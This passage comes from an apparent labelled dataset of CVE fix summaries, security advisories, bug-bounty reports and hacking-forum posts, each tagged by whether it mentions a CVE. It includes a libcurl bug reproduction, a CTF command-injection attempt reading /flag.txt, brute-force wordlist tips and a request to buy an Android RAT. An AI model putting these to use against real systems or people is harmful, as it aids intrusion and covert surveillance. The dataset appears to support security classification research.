"3b500d32a2a22f27b750", "text": "ChakraCore RCE Vulnerability\n\n[Severity: HIGH]\n\nA remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer, aka \"Scripting Engine Memory Corruption Vulnerability.\" This affects Internet Explorer 9, Internet Explorer 11, Internet Explorer 10. This CVE ID is unique from CVE-2018-8353, CVE-2018-8355, CVE-2018-8359, CVE-2018-8372, CVE-2018-8373, CVE-2018-8385, CVE-2018-8389, CVE-2018-8390.", "source": "github_advisory", "timestamp": "2022-05-13", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "514022df1e3212ec1134", "text": "Hello, did you find a solution ? I have the same problem", "source": "hackthebox", "timestamp": "2023-01-14", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "23f226d077b68cd725f4", "text": "What are the best free resources to learn Parrot OS ethical hacking\n\nHello guys, I’m looking for a complete comprehensive free course to learn ethical hacking and cybersecurity skills for Linux. Ive been trying to find something complete but it can’t seem to find good resources and if I happen to find some “free”, it turns out you have to pay to go deep into the topics otherwise you only get a glance of whats it about. One of the promising pages ive found is null byte but kinda seems not in order for someone who wants to learn from scratch and videos are sometimes from 4-6 years ago", "source": "parrotsec", "timestamp": "2022-05-29", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "aada01c08cc5f87f309f", "text": "hi there. the user to access the tomcat manager, is it tomcat or a different user? I am digging on log files and conf files accessible by user barry/group adm, but no luck", "source": "hackthebox", "timestamp": "2022-01-02", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "e706888757c3beb00ad4", "text": "CVE: CVE-2021-41162\n\n[{'lang': 'en', 'value': 'Combodo iTop is a web based IT Service Management tool. In 3.0.0 beta releases prior to beta6 the `ajax.render.php?operation=wizard_helper` page did not properly escape the user supplied parameters, allowing for a cross site scripting attack vector. Users are advised to upgrade. There are no known workarounds for this issue.'}]\n\nFix commit: N°4362 - XSS in ajax.render.php?operation=wizard_helper on develop", "source": "cvefixes", "timestamp": "2022-04-21", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "2acc15a58c36fb327d61", "text": "Airodump-ng command and host discovery\n\nHow exactly does airodump-ng command allows you to discover the hosts that are connected to the network. I understand the AP is transmitting beacons all the time so they could be connected to, but I don’t understand why the command can also output the hosts that are connected to it… Thanks in advance", "source": "hackersploit", "timestamp": "2022-10-30", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "45c01c0bfe288f87c5a2", "text": "[Expected Behavior Violation] CVE-2023-28322: more POST-after-PUT confusion\n\n## Summary:\nCVE-2022-32221 fixes is insufficient.\nIn CVE-2022-32221, only CURLOPT_POST was corrected.\nHowever, CURLOPT_POST is not necessarily used when sending data with the POST method.\nCURLOPT_POST is not used in the CURLOPT_POSTFIELDS usage example on the official website.\n```\nCURL *curl = curl_easy_init();\nif(curl) {\n const char *data = \"data to send\";\n \n curl_easy_setopt(curl, CURLOPT_URL, \"https://example.com\");\n \n /* size of the POST data */\n curl_easy_setopt(curl, CURLOPT_POSTFIELDSIZE, 12L);\n \n /* pass in a pointer to the data - libcurl will not copy */\n curl_easy_setopt(curl, CURLOPT_POSTFIELDS, data);\n \n curl_easy_perform(curl);\n}\n```\nAlso on this page is the following statement.\n\n>Using CURLOPT_POSTFIELDS implies setting CURLOPT_POST to 1.\n\nhttps://curl.se/libcurl/c/CURLOPT_POSTFIELDS.html\n\nI think it means that some users do not use CURLOPT_POST.\nJust to be clear, CURLOPT_POSTFIELDS does not set a `FLASE` on `data->set.upload`.\n\nCURLOPT_POST is not used in the CURLOPT_MIMEPOST usage example either.\nhttps://curl.se/libcurl/c/CURLOPT_MIMEPOST.html\n\nBased on the above, I think we need to modify the following to assign `FALSE` to `data->set.upload` if we use the following.\n* CURLOPT_POSTFIELDS\n* CURLOPT_COPYPOSTFIELDS\n* CURLOPT_MIMEPOST\n\nWe could not determine the deprecated CURLOPT_HTTPPOST.\n\n## Steps To Reproduce:\nAlmost the same source as #1704017. The difference is that line 52 is commented out.\n\n```\n#include \n#include \n#include \n\ntypedef struct\n{\n char *buf;\n size_t len;\n} put_buffer;\n\nstatic size_t put_callback(char *ptr, size_t size, size_t nmemb, void *stream)\n{\n put_buffer *putdata = (put_buffer *)stream;\n size_t totalsize = size * nmemb;\n size_t tocopy = (putdata->len < totalsize) ? putdata->len : totalsize;\n memcpy(ptr, putdata->buf, tocopy);\n putdata->len -= tocopy;\n putdata->buf += tocopy;\n return tocopy;\n}\n\nint main()\n{\n CURL *curl = NULL;\n put_buffer pbuf = {};\n char *otherdata = \"This is some other data\";\n\n curl_global_init(CURL_GLOBAL_DEFAULT);\n\n curl = curl_easy_init();\n\n // PUT\n curl_easy_setopt(curl, CURLOPT_UPLOAD, 1L);\n curl_easy_setopt(curl, CURLOPT_READFUNCTION, put_callback);\n pbuf.buf = strdup(\"This is highly secret and sensitive data\");\n pbuf.len = strlen(pbuf.buf);\n curl_easy_setopt(curl, CURLOPT_READDATA, &pbuf);\n curl_easy_setopt(curl, CURLOPT_INFILESIZE, pbuf.len);\n curl_easy_setopt(curl, CURLOPT_URL, \"http://host1.com/putsecretdata\");\n curl_easy_perform(curl);\n\n // Without this line, a PUT instead of a POST will be sent below (this is a bug in libcurl)\n //curl_easy_setopt(curl, CURLOPT_UPLOAD, 0L);\n\n // Without this line, the POST below will send \"This is highly secret and sensitive data\"\n // when instead the user intended to send \"This is some other data\"\n // With this line, the program will attempt to use freed data, causing a segfault or any number\n // of potential exploits.\n //free(pbuf.buf);\n\n // POST (will be a PUT without the line just above)\n //curl_easy_setopt(curl, CURLOPT_POST, 1L);\n curl_easy_setopt(curl, CURLOPT_POSTFIELDS, otherdata);\n curl_easy_setopt(curl, CURLOPT_POSTFIELDSIZE, strlen(otherdata));\n curl_easy_setopt(curl, CURLOPT_URL, \"http://host2.com/postotherdata\");\n curl_easy_perform(curl);\n\n curl_easy_cleanup(curl);\n\n curl_global_cleanup();\n\n return 0;\n}\n```\n\n## Supporting Material/References:\n[list any additional material (e.g. screenshots, logs, etc.)]\n\n * [attachment / reference]\n\n## Impact\n\nAn attacker could potentially inject data, either from stdin or from an unintended buffer. Further, without even an active attacker, this could lead to segfaults or sensitive information being exposed to an unintended recipient.", "source": "hackerone", "timestamp": "2023-05-18", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "737a93f8c21c8357817d", "text": "Appreciate your help Will check for sure SpyNote! Btw I found this one and it’s work good as for now, till Android 10! GitHub - qH0sT/AndroSpy: An Android RAT that written in C# by me . To be honest I need something which work android 11 + I can even pay for it", "source": "parrotsec", "timestamp": "2022-01-26", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "b5b49cc437c8d26486ed", "text": "CVE: CVE-2022-21676\n\n[{'lang': 'en', 'value': 'Engine.IO is the implementation of transport-based cross-browser/cross-device bi-directional communication layer for Socket.IO. A specially crafted HTTP request can trigger an uncaught exception on the Engine.IO server, thus killing the Node.js process. This impacts all the users of the `engine.io` package starting from version `4.0.0`, including those who uses depending packages like `socket.io`. Versions prior to `4.0.0` are not impacted. A fix has been released for each major branch, namely `4.1.2` for the `4.x.x` branch, `5.2.1` for the `5.x.x` branch, and `6.1.1` for the `6.x.x` branch. There is no known workaround except upgrading to a safe version.'}]\n\nFix commit: fix: properly handle invalid data sent by a malicious websocket client\n\n**IMPORTANT SECURITY FIX**\n\nA malicious client could send a specially crafted HTTP request,\ntriggering an uncaught exception and killing the Node.js process:\n\n> RangeError: Invalid WebSocket frame: RSV2 and RSV3 must be clear\n> at Receiver.getInfo (/.../node_modules/ws/lib/receiver.js:176:14)\n> at Receiver.startLoop (/.../node_modules/ws/lib/receiver.js:136:22)\n> at Receiver._write (/.../node_modules/ws/lib/receiver.js:83:10)\n> at writeOrBuffer (internal/streams/writable.js:358:12)\n\nThis bug was introduced by [1], included in `engine.io@4.0.0`, so\nprevious releases are not impacted.\n\n[1]: https://github.com/socketio/engine.io/commit/f3c291fa613a9d50c924d74293035737fdace4f2\n\nThanks to Marcus Wejderot from Mevisio for the responsible disclosure.", "source": "cvefixes", "timestamp": "2022-01-12", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "a577f5406ccb37d93eb6", "text": "Hack The Box Academy - FOOTPRINTING - DNS enumeration\n\nHello together, right now I’m stuck at in the FOOTPRINTING module of Hack The Box Academy in the DNS enumeration section. I’m stuck at the following question: “What is the FQDN of the host where the last octet ends with “x.x.x.203”?” I already used all the big subdomain lists from the SecLists directory to enumerate the subdomains but i did not find the ip address which ends with .203. I use dnsenum for the DNS enumeration. Can someone please give me some hints or point me to correct wordlist which can be used to find the correct ip? Best regards", "source": "hackthebox", "timestamp": "2022-01-12", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "d63286b2b6a0f756d558", "text": "CVE: CVE-2022-24976\n\n[{'lang': 'en', 'value': 'Atheme IRC Services before 7.2.12, when used in conjunction with InspIRCd, allows authentication bypass by ending an IRC handshake at a certain point during a challenge-response login sequence.'}]\n\nFix commit: saslserv/main: Track EID we're pending login to\n\nThe existing model does not remember that we've sent a SVSLOGIN for a\ngiven SASL session, and simply assumes that if a client is introduced\nwith a SASL session open, that session must have succeeded. The security\nof this approach requires ircd to implicitly abort SASL sessions on\nclient registration.\n\nThis also means that if a client successfully authenticates and then\ndoes something else its pending login is forgotten about, even though a\nSVSLOGIN has been sent for it, and the ircd is going to think it's\nlogged in.\n\nThis change removes the dependency on ircd's state machine by keeping\nexplicit track of the pending login, i.e. the one we've most recently\nsent a SVSLOGIN for. The next commit will ensure that a client abort\n(even an implicit one) doesn't blow that information away.", "source": "cvefixes", "timestamp": "2022-02-14", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "95d6cb39fee485f930d6", "text": "CVE: CVE-2021-45936\n\n[{'lang': 'en', 'value': 'wolfSSL wolfMQTT 1.9 has a heap-based buffer overflow in MqttDecode_Disconnect (called from MqttClient_DecodePacket and MqttClient_WaitType).'}]\n\nFix commit: Fix wolfmqtt-fuzzer: Null-dereference WRITE in MqttProps_Free", "source": "cvefixes", "timestamp": "2022-01-01", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "537fdf25325da58786ff", "text": "i tried with: bash (base64) and encoded spaces and slashes which contain after decode cat /flag.txt and all I get after putting this payload after to= or from= in burp image 806×321 17.3 KB and try cp and mv and don’t have results but malicious code denied I will appreciate your help", "source": "hackthebox", "timestamp": "2023-12-24", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "7b1d9fee5c8f2f2267b8", "text": "I need some help, to making the wordlist of Harry. Do I need to know a lot about of the harry potter movies/books to generate the right wordlist? Or not? Do I need use the “interactive” mode of cupp for generate the right wordlist? Becuase I don’t know much about Harry Potter and I’m stuck in the wordlist, I can’t get a wordlist with 13k line of length.", "source": "hackthebox", "timestamp": "2022-01-24", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "89fb348d4f8467e6fa9d", "text": "Cross-site Scripting in Jenkins Filesystem List Parameter Plugin\n\n[Severity: HIGH]\n\nJenkins Filesystem List Parameter Plugin 0.0.7 and earlier does not escape the name and description of File system objects list parameters on views displaying parameters, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Item/Configure permission.\n\nExploitation of this vulnerability requires that parameters are listed on another page, like the \\\"Build With Parameters\\\" and \\\"Parameters\\\" pages provided by Jenkins (core), and that those pages are not hardened to prevent exploitation. Jenkins (core) has prevented exploitation of vulnerabilities of this kind on the \\\"Build With Parameters\\\" and \\\"Parameters\\\" pages since 2.44 and LTS 2.32.2 as part of the [SECURITY-353 / CVE-2017-2601](https://www.jenkins.io/security/advisory/2017-02-01/#persisted-cross-site-scripting-vulnerability-in-parameter-names-and-descriptions) fix. Additionally, several plugins have previously been updated to list parameters in a way that prevents exploitation by default, see [SECURITY-2617 in the 2022-04-12 security advisory for a list](https://www.jenkins.io/security/advisory/2022-04-12/#SECURITY-2617).", "source": "github_advisory", "timestamp": "2022-06-24", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "64964d59c175c2b4ae20", "text": "[Code Injection] CVE-2022-21831: Possible code injection vulnerability in Rails / Active Storage\n\nOriginal report: https://hackerone.com/reports/1154034\nRails advisory: https://discuss.rubyonrails.org/t/cve-2022-21831-possible-code-injection-vulnerability-in-rails-active-storage/80199\nBlogpost: https://blog.convisoappsec.com/en/cve-2022-21831-overview-of-the-security-issues-we-found-in-railss-image-processing-api/\n\nIf the report is eligible for a bounty, please split it equally between me and @rsilva, if possible.\n\n## Impact\n\nVulnerable code patterns could allow the attacker to achieve RCE.", "source": "hackerone", "timestamp": "2022-09-10", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "bf4ea2b7d3e5973b1db4", "text": "Nmap-cheat-sheet\n\nA very nice help using nmap. StationX – 1 May 20 Nmap Cheat Sheet Example IDS Evasion command", "source": "hackersploit", "timestamp": "2022-04-16", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "8823ae1033c2f8ecc509", "text": "the challenge says: We are given the IP address of an online academy but have no further information about their website. As the first step of conducting a Penetration Testing engagement, we have to determine whether any weak credentials are used across the website and other login services. Look beyond just default/common passwords. Use the skills learned in this module to gather information about employees we identified to create custom wordlists to attack their accounts. Attack the web application and submit two flags using the skills we covered in the module sections and submit them to complete this module. How will I know that they talk about Harry Potter, is that I have a crystal ball, These reots should improve the context,I know it’s about Harry because I’ve read it on the forum but I don’t know when it would have occurred to me that it was about Howards Academy", "source": "hackthebox", "timestamp": "2022-01-02", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "e7e69f4b1c212eef8ee5", "text": "GREENIE seems to be the key, and I agree that understanding it is crucial. If you’re hitting a “An error occurred” message when running the EXE, there might be something you’re missing in the setup. Regarding endianness, it’s a bit tricky. Little Endian can affect how data is stored and read in memory, but its direct impact on the software might not always be obvious. Try examining the code closely to see if it’s manipulating data in a way that relates to endianness. For more guidance, I’d suggest checking out some malware analysis writeups . These can provide valuable insights into how others have approached similar challenges.", "source": "hackthebox", "timestamp": "2023-10-09", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "9befa5492558ef189aec", "text": "greetings people, help me please what password word-list I should use? there is tons of it", "source": "hackthebox", "timestamp": "2023-02-07", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "12887d7238cd959ba6ad", "text": "Hey moron. I should know better then to click links but your link to porn is just fucked up.", "source": "parrotsec", "timestamp": "2023-01-12", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "a7de5450be6aabec6249", "text": "CVE: CVE-2022-0937\n\n[{'lang': 'en', 'value': 'Stored xss in showdoc through file upload in GitHub repository star7th/showdoc prior to 2.10.4.'}]\n\nFix commit: file upload bug", "source": "cvefixes", "timestamp": "2022-03-14", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "e7c56ffa3c1100f4e148", "text": "[Improper Certificate Validation] CVE-2023-28321: IDN wildcard match\n\n## Summary:\ncurl /libcurl uses wildcards for validation during TLS communication, even if the hostname is an IDN.\nEven if wildcards are present in the CN/SAN of the certificate, they must not be used to match if the hostname is an IDN.\nThis is described in [RFC-6125, section 6.4.3.][RFC]\n[RFC]: https://datatracker.ietf.org/doc/html/rfc6125#section-6.4.3\nYou probably know that.\nHowever, there was a problem with the implementation.\n`lib/vtls/hostcheck.c` in the function 'hostmatch' on lines 100-106.\n\n```\n /* We require at least 2 dots in the pattern to avoid too wide wildcard\n match. */\n pattern_label_end = memchr(pattern, '.', patternlen);\n if(!pattern_label_end ||\n (memrchr(pattern, '.', patternlen) == pattern_label_end) ||\n strncasecompare(pattern, \"xn--\", 4))\n return pmatch(hostname, hostlen, pattern, patternlen);\n```\nI think `strncasecompare(pattern, \"xn--\", 4))` is `strncasecompare(hostname, \"xn--\", 4))`.\n`pattern` is a value that contains wildcards because it is CN/SAN.\nIn other words, it will not match \"xn--\" because it will be a string containing wildcards.\n\n## Steps To Reproduce:\n 1. Create a wildcard certificate.As an example, attach a certificate and private key with CN value of `x*.example.local`. {F2298301} {F2298300}\n 2. `openssl s_server -accept 443 -cert server.crt -key server.key -www`\n 3. Modify hosts so that the name resolution result of `xn--l8j.example.local‘ is the IP of your machine in order to perform the test in the local environment.\n4. `curl https://%E3%81%82.example.local --cacert server.crt`\n\nWhen the above is executed, the communication succeeds even though it should result in a validation error.\n\n## Impact\n\nImproper Validation of Certificate with Host Mismatch.", "source": "hackerone", "timestamp": "2023-05-18", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "88e0d5f7408167aab11b", "text": "CVE: CVE-2022-29180\n\n[{'lang': 'en', 'value': \"A vulnerability in which attackers could forge HTTP requests to manipulate the `charm` data directory to access or delete anything on the server. This has been patched and is available in release [v0.12.1](https://github.com/charmbracelet/charm/releases/tag/v0.12.1). We recommend that all users running self-hosted `charm` instances update immediately. This vulnerability was found in-house and we haven't been notified of any potential exploiters. ### Additional notes * Encrypted user data uploaded to the Charm server is safe as Charm servers cannot decrypt user data. This includes filenames, paths, and all key-value data. * Users running the official Charm [Docker images](https://github.com/charmbracelet/charm/blob/main/docker.md) are at minimal risk because the exploit is limited to the containerized filesystem.\"}]\n\nFix commit: fix: clean path before accessing file store", "source": "cvefixes", "timestamp": "2022-05-07", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "17f53a1bb0f1e963ea1a", "text": "CVE: CVE-2022-24959\n\n[{'lang': 'en', 'value': 'An issue was discovered in the Linux kernel before 5.16.5. There is a memory leak in yam_siocdevprivate in drivers/net/hamradio/yam.c.'}]\n\nFix commit: yam: fix a memory leak in yam_siocdevprivate()\n\nym needs to be free when ym->cmd != SIOCYAMSMCS.\n\nFixes: 0781168e23a2 (\"yam: fix a missing-check bug\")\nSigned-off-by: Hangyu Hua \nSigned-off-by: David S. Miller ", "source": "cvefixes", "timestamp": "2022-02-11", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "1cf1040ae5e4b879f032", "text": "never mind, i found it: ^ (caret) means “the beginning of the line”. So “^a” means find a line starting with an “a”.", "source": "hackthebox", "timestamp": "2023-12-29", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "e7c23792b5c65d79687f", "text": "Network manager service \n\nimage 3024×4032 3.8 MB After airmon kill I cannot enable networking I ve update but every time it says network manager service could not be found", "source": "parrotsec", "timestamp": "2023-07-04", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "9a4d326993c00e082e5c", "text": "this site here has a helpful pathway Free Ethical Hacking Tutorials for Beginners [Learn How to Hack]", "source": "parrotsec", "timestamp": "2023-09-18", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "e63937612958ce707fb8", "text": "CVE: CVE-2022-0527\n\n[{'lang': 'en', 'value': 'Cross-site Scripting (XSS) - Stored in GitHub repository chatwoot/chatwoot prior to 2.2.0.'}]\n\nFix commit: fix: Ongoing campaign URL validation (#3890)", "source": "cvefixes", "timestamp": "2022-02-09", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "639e3ac2e3e7ca0edf03", "text": "Should I install windows on my laptop, or should I start with kali immediately?", "source": "hackersploit", "timestamp": "2022-05-02", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "dc0fc7d1a728bdffbb80", "text": "Hi, I also have a question. I created a userlist based on Harry Potter with the username_anarchy tool. I created a pass list based on the name I got in the previous exercise using cupp. Parameters also set to correct and still bruteforcing lasts about an hour and does not give a positive result. What am I doing wrong? Edit: i found solution of my problem. Little advice, when you generate list in cupp, remember only Name, special characters and 1337 is Yes, other, just hit Enter.", "source": "hackthebox", "timestamp": "2023-08-18", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "ca5f8eecc07a232d3561", "text": "CVE: CVE-2021-3602\n\n[{'lang': 'en', 'value': 'An information disclosure flaw was found in Buildah, when building containers using chroot isolation. Running processes in container builds (e.g. Dockerfile RUN commands) can access environment variables from parent and grandparent processes. When run in a container in a CI/CD environment, environment variables may include sensitive information that was shared with the container in order to be used only by Buildah itself (e.g. container registry credentials).'}]\n\nFix commit: chroot: fix environment value leakage to intermediate processes\n\nBlake Burkhart reports that when running processes using \"chroot\"\nisolation, the process being run can examine the environment of its\nimmediate parent and grandparent processes (CVE-2021-3602).\n\nWhen run in a container in a CI/CD environment, the environment may\ninclude sensitive information which was shared with the container in\norder to be used only by buildah itself. The command being executed is\nable to read such information.\n\nThis patch reduces the set of environment variables passed to these\nintermediate processes, from all variables to the one which is used to\ncontrol the level of debug logging. It also corrects a misleading debug\nmessage and expands the description of chroot isolation in man pages.\n\nSigned-off-by: Nalin Dahyabhai ", "source": "cvefixes", "timestamp": "2022-03-03", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "1f73f1152ca92b21a51e", "text": "CVE: CVE-2022-31139\n\n[{'lang': 'en', 'value': \"UnsafeAccessor (UA) is a bridge to access jdk.internal.misc.Unsafe & sun.misc.Unsafe. Normally, if UA is loaded as a named module, the internal data of UA is protected by JVM and others can only access UA via UA's standard API. The main application can set up `SecurityCheck.AccessLimiter` for UA to limit access to UA. Starting with version 1.4.0 and prior to version 1.7.0, when `SecurityCheck.AccessLimiter` is set up, untrusted code can access UA without limitation, even when UA is loaded as a named module. This issue does not affect those for whom `SecurityCheck.AccessLimiter` is not set up. Version 1.7.0 contains a patch.\"}]\n\nFix commit: Fix UnsafeAccess perm checking", "source": "cvefixes", "timestamp": "2022-07-11", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "bc9efa05117564fd1a90", "text": "android rooting with parrot os\n\nOk here goes anyone can advised on unlocking bootloader and rooting a andriod on the os", "source": "parrotsec", "timestamp": "2023-09-17", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "bdc897877ce955dfc099", "text": "I will say for the second question of the service login in the skills assesment where it asks you to find the other user and brute force their password, hydra took about 5 minutes to complete. I thought I was doing something wrong because it was taking a little while but it should work.", "source": "hackthebox", "timestamp": "2022-02-21", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "c62d0d2ec6b574a0bac6", "text": "CVE: CVE-2022-31042\n\n[{'lang': 'en', 'value': 'Guzzle is an open source PHP HTTP client. In affected versions the `Cookie` headers on requests are sensitive information. On making a request using the `https` scheme to a server which responds with a redirect to a URI with the `http` scheme, or on making a request to a server which responds with a redirect to a a URI to a different host, we should not forward the `Cookie` header on. Prior to this fix, only cookies that were managed by our cookie middleware would be safely removed, and any `Cookie` header manually added to the initial request would not be stripped. We now always strip it, and allow the cookie middleware to re-add any cookies that it deems should be there. Affected Guzzle 7 users should upgrade to Guzzle 7.4.4 as soon as possible. Affected users using any earlier series of Guzzle should upgrade to Guzzle 6.5.7 or 7.4.4. Users unable to upgrade may consider an alternative approach to use your own redirect middleware, rather than ours. If you do not require or expect redirects to be followed, one should simply disable redirects all together.'}]\n\nFix commit: Release 7.4.4 (#3023)", "source": "cvefixes", "timestamp": "2022-06-10", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "08e19b8132b08acc4623", "text": "CVE: CVE-2022-21666\n\n[{'lang': 'en', 'value': 'Useful Simple Open-Source CMS (USOC) is a content management system (CMS) for programmers. Versions prior to Pb2.4Bfx3 allowed Sql injection in usersearch.php only for users with administrative privileges. Users should replace the file `admin/pages/useredit.php` with a newer version. USOC version Pb2.4Bfx3 contains a fixed version of `admin/pages/useredit.php`.'}]\n\nFix commit: Update usersearch.php", "source": "cvefixes", "timestamp": "2022-01-10", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "ebcfae413e0451898d91", "text": "Plaintext storage of sensitive data in Rancher API and cluster.management.cattle.io objects\n\n[Severity: HIGH]\n\n### Impact\n\nThis issue affects Rancher versions from 2.5.0 up to and including 2.5.16, from 2.6.0 up to and including 2.6.9 and 2.7.0. It was discovered that the security advisory CVE-2021-36782 (GHSA-g7j7-h4q8-8w2f), previously released by Rancher, missed addressing some sensitive fields, secret tokens, encryption keys, and SSH keys that were still being stored in plaintext directly on Kubernetes objects like `Clusters`.\n\nThe exposed credentials are visible in Rancher to authenticated `Cluster Owners`, `Cluster Members`, `Project Owners` and `Project Members` of that cluster on the endpoints:\n\n- `/v1/management.cattle.io.cluster`\n- `/v1/management.cattle.io.clustertemplaterevisions`\n\nThe remaining sensitive fields are now stripped from `Clusters` and other objects and moved to a `Secret` before the object is stored. The `Secret` is retrieved when the credential is needed. For objects that existed before this security fix, a one-time migration happens on startup.\n\nThe fields that have been addressed by this security fix are:\n\n- `Cluster.Spec.RancherKubernetesEngineConfig.Services.KubeAPI.SecretsEncryptionConfig.CustomConfig.Providers[].AESGCM.Keys[].Secret`\n- `Cluster.Spec.RancherKubernetesEngineConfig.Services.KubeAPI.SecretsEncryptionConfig.CustomConfig.Providers[].AESCBC.Keys[].Secret`\n- `Cluster.Spec.RancherKubernetesEngineConfig.Services.KubeAPI.SecretsEncryptionConfig.CustomConfig.Providers[].SecretboxConfiguration.Keys[].Secret`\n- `Cluster.Spec.RancherKubernetesEngineConfig.Services.Kubelet.ExtraEnv` when containing the `AWS_SECRET_ACCESS_KEY` environment variable\n- `Cluster.Spec.RancherKubernetesEngineConfig.BastionHost.SSHKey`\n- `Cluster.Spec.RancherKubernetesEngineConfig.PrivateRegistries[].ECRCredentialPlugin.AwsSecretAccessKey`\n- `Cluster.Spec.RancherKubernetesEngineConfig.PrivateRegistries[].ECRCredentialPlugin.AwsSessionToken`\n- `Cluster.Spec.RancherKubernetesEngineConfig.Network.AciNetworkProvider.ApicUserKey`\n- `Cluster.Spec.RancherKubernetesEngineConfig.Network.AciNetworkProvider.KafkaClientKey`\n- `Cluster.Spec.RancherKubernetesEngineConfig.Network.AciNetworkProvider.Token`\n\n**Important:**\n\n- For the exposure of credentials not related to Rancher, the final impact severity for confidentiality, integrity and availability is dependent on the permissions the leaked credentials have on their services.\n\n- It is recommended to review for potentially leaked credentials in this scenario and to change them if deemed necessary.\n\n### Workarounds\n\nThere is no direct mitigation besides updating Rancher to a patched version.\n\n### Patches\n\nPatched versions include releases 2.5.17, 2.6.10, 2.7.1 and later versions.\n\nAfter upgrading to a patched version, it is important to check for the `ACISecretsMigrated` and `RKESecretsMigrated` conditions on `Clusters` and `ClusterTemplateRevisions` to confirm when secrets have been fully migrated off of those objects, and the objects scoped within them.\n\n### For more information\n\nIf you have any questions or comments about this advisory:\n\n* Reach out to [SUSE Rancher Security team](https://github.com/rancher/rancher/security/policy) for security related inquiries.\n* Open an issue in [Rancher](https://github.com/rancher/rancher/issues/new/choose) repository.\n* Verify our [support matrix](https://www.suse.com/suse-rancher/support-matrix/all-supported-versions/) and [product support lifecycle](https://www.suse.com/lifecycle/).", "source": "github_advisory", "timestamp": "2023-01-25", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "97b564237064bd67dec0", "text": "Well, in my opinion, a compensation plan based on results can be an effective way to motivate individuals and achieve specific objectives. Still, it requires careful consideration of the goals, performance metrics, and potential downsides. It's important to ensure that the objectives are achievable, that the measurement of individual performance is fair and accurate, and that individuals are not penalized for factors beyond their control. Ultimately, it's important to weigh the risks and benefits of this approach before making a decision. Hope you are clear now. Thanks", "source": "go4expert", "timestamp": "2023-03-17", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "d18393d9663fa391b0f1", "text": "CVE: CVE-2022-0990\n\n[{'lang': 'en', 'value': 'Server-Side Request Forgery (SSRF) in GitHub repository janeczku/calibre-web prior to 0.6.18.'}]\n\nFix commit: Better epub cover parsing with multiple cover-image items\nCode cosmetics\nrenamed variables\nrefactored xml page generation\nrefactored prepare author", "source": "cvefixes", "timestamp": "2022-04-04", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "f941e88231494a99e69d", "text": "CVE: CVE-2022-25299\n\n[{'lang': 'en', 'value': 'This affects the package cesanta/mongoose before 7.6. The unsafe handling of file names during upload using mg_http_upload() method may enable attackers to write files to arbitrary locations outside the designated target folder.'}]\n\nFix commit: Protect against the directory traversal in mg_upload()", "source": "cvefixes", "timestamp": "2022-02-18", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "c2db076d535999f45ba8", "text": "For the first step you must use the information that you suppose, first use cupp to get a password list, remember the filters of this list that you learned in the previous lessons (sed …), after that, as the exercise recommend use the tool username-anarchy to create a list of usernames. With these tips you should pass the first parth of the exercise. Best, Amaro", "source": "hackthebox", "timestamp": "2022-01-28", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "fd5d94259358bb360ec1", "text": "CVE: CVE-2021-4216\n\n[{'lang': 'en', 'value': 'A Floating point exception (division-by-zero) flaw was found in Mupdf for zero width pages in muraster.c. It is fixed in Mupdf-1.20.0-rc1 upstream.'}]\n\nFix commit: Bug 704834: Fix division by zero for zero width pages in muraster.", "source": "cvefixes", "timestamp": "2022-08-26", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "057dcf41e4433e712fb7", "text": "Anyone else struggling with this, remember the hint from the first question: Use options “–batch --dump” to automatically dump all data. This was a deal breaker for me", "source": "hackthebox", "timestamp": "2022-02-14", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "09c6417ca6b58b647bb8", "text": "I also stuck with Elasticity. I have terminal as ***x, I see files from ***x and ***y, but not sure if I understand what to do with them yet. But this will be the next step. Right now I’m trying to solve Elasticity part and I have timeouts from both ports. I tried IPv4 and IPv6, different hostnames and so on. I just can’t use REST API for some reason. Maybe I just don’t see something. Any hint is appreciated. P.S. I start suspecting it’s 